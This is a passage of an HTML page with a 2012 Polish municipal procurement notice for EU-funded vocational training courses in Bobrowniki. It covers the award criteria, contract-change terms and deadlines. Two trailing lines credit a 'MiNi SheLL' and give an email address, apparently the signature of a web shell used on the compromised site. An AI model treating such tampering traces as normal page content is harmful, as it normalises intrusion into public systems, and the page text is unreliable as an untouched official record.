<li>4 - Doświadczenie Wykonawcy w realizacji kursu Brukarz - 5</li>
<li>5 - Doświadczenie Wykonawcy w realizacji kursu Pomoc kuchenna z elementami dekoracji stołów - 5</li>
<li>6 - Doświadczenie Wykonawcy w realizacji kursu Kadry i płace - 5</li>
<li>7 - Doświadczenie  Wykonawcy w realizacji kursu Sprzedawca z obsługą kasy fiskalnej - 5</li>
<li>8 - Doświadczenie Wykonawcy w realizacji kursu Prawo jazdy kat. B, Prawo jazdy kat. C - 5</li>
<li>9 - Doświadczenie Wykonawcy w realizacji kursu Operator koparko - ładowarki - 5</li>
<li>10 - Doświadczenie Wykonawcy w realizacji szkolenia Warsztaty interpersonalne - 5</li>
<li>11 - Doświadczenie Wykonawcy w realizacji szkolenia Warsztaty rękodzieła artystycznego (w zakresie sztucznej biżuterii) - 5</li>
<li>12 - Ilość wykonanych szkoleń - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający przewiduje możliwość zmiany postanowień umowy (zgodnie z art. 144 ustawy Pzp) w przypadkach, gdy:
a) nastąpi zmiana przepisów wpływających na realizację przedmiotu zamówienia,
b) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie;
c) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej;
d) konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego;
e) z powodu okoliczności siły wyższej, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć w chwili zawarcia umowy;
f) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
g) zaistnieją okoliczności niezależne od Zamawiającego i Wykonawcy uzasadniające zmianę terminów realizacji przedmiotu umowy,
i) zaistnieją okoliczności niezależne od Zamawiającego i Wykonawcy, uzasadniające zmianę miejsca realizacji szkoleń, przy czym zmiana nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w Załączniku nr 1 do SIWZ Opis przedmiotu zamówienia
2. Zamawiający dopuszcza zmianę osoby-osób prowadzącej-ych szkolenia-kursy w toku realizacji zamówienia, ale jedynie w uzasadnionych przypadkach, w szczególności na wypadek choroby lub innej okoliczności uniemożliwiającej osobie prowadzącej szkolenia-kursy wykonywanie obowiązków wynikających z umowy. Zmiana osoby prowadzącej szkolenia-kursy jest dopuszczalna pod warunkiem, że wskazana osoba (zastępca) posiada takie same lub wyższe kwalifikacje zawodowe.
3.W przypadku obiektywnie pojawiających się okoliczności Zamawiający dopuszcza zmianę ilości osób w poszczególnych szkoleniach-kursach. Przy czym Zamawiający zastrzega, że ogólna ilość osób przewidywana do objęcia wsparciem w formie szkoleń-kursów, zgodnie z Załącznikiem nr 1 (tj. łącznie 27 osób) nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopsbobrowniki.bipstrona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Bobrownikach, ul. Nieszawska 10, 87 - 617 Bobrowniki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2012 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Bobrownikach, ul. Nieszawska 10, 87 - 617 Bobrowniki, parter, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pt. Stop wykluczeniu - czas na aktywność jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com